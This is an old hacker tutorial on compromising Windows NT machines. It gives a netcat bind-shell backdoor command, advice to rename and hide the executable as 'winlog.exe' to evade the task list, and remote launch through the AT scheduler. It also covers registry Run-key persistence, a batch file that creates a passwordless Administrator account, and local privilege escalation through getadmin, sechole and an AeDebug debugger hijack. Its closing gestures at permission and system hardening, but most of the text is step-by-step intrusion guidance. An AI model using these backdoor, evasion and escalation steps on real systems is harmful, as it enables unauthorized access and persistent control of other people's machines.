Creating backdoors is how you can insure your ability to return to the system at will. This is almost a black art when dealing with Un*x systems, and it can also be done on NT. netcat, from Weld Pond, takes advantage of any user's ability to use a local port. netcat is a command-line utility that has several switches used to configure it's operation. This makes netcat, combined with a properly configured command-line launched from a batch file, an excellent choice for a backdoor. (get netcat for NT from http://www.l0pht.com/weld) The batch file needs to contain: nc -L -d -p [port] -t -e cmd.exe L tells netcat to open keep listening after the current session terminates d detach - don't open a DOS window when running (IMPORTANT) p which port to bind to t enable telnet negotiations e command to execute upon connection Copy this command line into a batch file named "runnc.bat" or something similar. Then copy both the netcat executeable file and the batch file to a directory that is in the PATH on the target machine...c:\winnt\system32\ is a good place to hide them. Another little trick to keep in mind is to rename the netcat executable from 'nc.exe' to something innocuous, like 'winlog.exe' (and make sure to make the appropriate changes to the batch file). That way, when you or your buddy opens the TaskList, there won't seem to be any 'unusual' programs running. Run the batch file on your own machine, and open the TaskList (right-click on the TaskBar, and choose TaskList)... Once this batch file is run, all you need to do is connect via telnet, or netcat in client mode: c:\>nc -v [ipaddress of target] [port] So how do you run this batch file? By default, NT doesn't have an interactive telnet server installed so that you can just log in, so what do you do? Well, there is a great little service called the Schedule (or 'AT') service, which lets you schedule programs to be run at a later date. To see if your Schedule service is running, you can either click Control Panel -> Services, and check it, or if you have Perl installed (see above), you can run the following script to see if the service is running, and if not, start it: ----- begin script ----- # atchk.plx # Script checks to see if AT service is running on local # machine...if not, starts it. Minor modifications will # allow you to do the same thing on a remote machine, once # have successfully completed the IPC$ connection and have # Administrator rights. # # usage: perl atchck.plx use Win32::Service; use Win32; my %status; Win32::Service::GetStatus('','Schedule', \%status); die "service is arealdy started\n" if ($status{CurrentState} == 4); Win32::Service::StartService(Win32::NodeName( ),'Schedule') || die "Can't start service\n"; print "Service started\n"; #**Note: This script was modified from: #http://www.inforoute.cgs.fr/leberre1/perlser.htm ----- end script ----- Note: Only Administrators or members of the Administrators group can run the AT command. Once installed, the 'runnc.bat' file can be executed via the AT command. The necessary syntax for the AT command is: AT [\\computername] [time] "command" or more particularly: AT [\\computername] [time] runnc.bat References to commands can be hidden in various places within the registry, set to run when a user logs in: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServic es HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Note: This last key is where you will find things like AOL's Instant Messenger. The install puts the reference to the app there, but you won't find it in your StartUp box... Here's another little exercise that you should run on your own machine first, and then try copying it over to a friend's machine and running it via the AT command. The batch file below uses commands that are native to NT to create a new user account, then make that user a member of the Administrator group: ----- begin batch file ----- @echo off net user Admin /add /expires:never /passwordreq:no net localgroup "Administrators" /add Admin net localgroup "Users" /del Admin ----- end batch file ----- What are some other neat little tricks to try? Get Netbus from http://netbus.hypermart.net/ . This little program is similar to Back Orifice, and it runs on NT. (Visit the makers of Back Orifice at http://www.cultdeadcow.com/) Okay, so you and your 'leet buddies have played around with each other's machines via the Internet, and pretty much walked through the exercises listed above. Now, what are some local 'attacks' that you can run against your own machine? [Local Attacks] Let's say you have a couple of accounts on your NT box, at least one with Admin rights, and one or two others with user rights. You've already run through the password cracking exercise and seen how easy it is to get the 'SAM._' file and crack it. So what else can you do? Well, you try the 'getadmin' exploit. This exploit consists of a program and .dll file that will add the user to the Administrator group. Get the necessary files from: http://www.nmrc.org/files/nt/index.html The Microsoft site has a hotfix for the "getadmin" exploit, located at: ftp://ftp.microsoft.com/bussys/winnt/winnt-public/fixes/usa/ nt40/hotfixes-postSP3/getadmin-fix/ General information on security problems addressed by Microsoft can be found at: http://www.microsoft.com/security/issues.htm For more information on the 'getadmin' exploit, go to: http://www.ntsecurity.net and search for 'getadmin'. All you need to do to test this exploit is log onto your system via a user account, copy the files into a directory, and run getadmin.exe. Another local exploit similar to the "getadmin" exploit has popped up. The exploit works like this: the user runs a program called "sechole.exe" and the final result (possibly after a reboot) is that the user now has administrator rights! For more information on this and the zipped archive "sechole.zip", go to: http://www.technotronic.com/microsoft.html A variation on this exploit involves the Registry setting the determines what the default debugger (the program run when a user mode program crashes) is run. Usually, the setting is: Hive: HKEY_LOCAL_MACHINE Key: \Software\Microsoft\Windows NT\CurrentVersion\AeDebug Value: Debugger Data Type: REG_SZ Default Value: drwtsn32 -p %ld -e %ld -g The "Everyone" group has the ability to set the value of this key, and is essential how you can exploit it. The debugger runs in the security context of the crashed application, so all you need to do is change the Default Value (via 'regedit') to point to the User Manager, and then crash one of the services that are running. Then you can add accounts to the User Manager...even to the Administrator group. ******************************************************************* NEWBIE NOTE: Before any changes are made to the Registry, make sure that you make a backup of your current Registry using the "rdisk /s" utility. You can make changes to the Registry by clicking Start -> Run, and entering either 'regedit' or 'regedt32'. Before you attempt any of this, read the files pertaining to the Registry from the Rhino9 site (http://207.89.195.250/texts/), the "Hacker's Modern Desk Reference" (http://www.antionline.com/SpecialReports/MHD/) and even "Hardening NT" (http://pw2.netcom.com/~honeyluv/index.html). ******************************************************************* Another local exploit that you can attempt uses the NTFSDOS utility, which is nothing more than a bootable DOS diskette that can read (but not write to) NTFS partitions. This would potentially allow an attacker to make off with copies of systems files, to include the SAM database. The folks at Systems Internals (http://www.sysinternals.com) have not only an NTFSDOS utility available, but also some tools that give the user limited write capability. SysInternals also has NTRecover and NTLocksmith, along with a variety of other useful tools. Get a copy of the utility, and try booting your own system with the diskette in the A:\ drive. There is a nifty little utility available, one that is essentially a Linux boot disk: http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html The utility comes with rawrite.exe, so that DOS and Windows users can download the utility and create the Linux boot disk. The utility is a NTFS-bootable minimal kernel, with a small program that allows the user to change any password in the SAM database. Alternatively, you can find the Linux binary file (without the rawrite.exe utility) at: http://www.nmrc.org/files/snt/index.html called bootdisk.bin, and according to the description, this is the file you are interested in. You will still need to get a copy of rawrite.exe, in order to write the information to a diskette in a useable form. Carefully read the instructions on the web page for the utility (listed above) and if you are feeling especially '31337', try it out against your own system. [Final Words] By now you should be familiar with some of the methods used to attack and compromise an NT system. Hopefully, you have seen fit to try out the exercises on your own system, or against a friend's system (with permission, of course). And it should start becoming clear what it takes to secure a system from attack. The first step is to become familiar with various exploits by regularly visiting such sites as RootShell (http://www.rootshell.com), the ISS X-Force site (http://www.iss.net/xforce), NTSecurity (http://www.ntsecurity.net), and NTBugTraq (http://www.ntbugtraq.com). Then go to the Microsoft Support (http://support.microsoft.com) and Security (http://www.microsoft.com/security) sites to see what the 'official' fixes are...the NTBugTraq site does a great job of keeping track of the latest hotfixes, and which ones are obsolete. The Microsoft Support site is especially useful, because you can search for information or specific KnowledgeBase articles, and print out those that you find useful. The "Hardening NT" document from Santeria Systems (http://pw2.netcom.com/~honeyluv/index.html) provides an excellent guide for protecting your system, complete with references to the appropriate KnowledgeBase article for each step. Finally, Microsoft maintains a list of security bulletins at: http://www.microsoft.com/security Sir Pent. Vice-Prezident [UHA] "The Net is my Playground"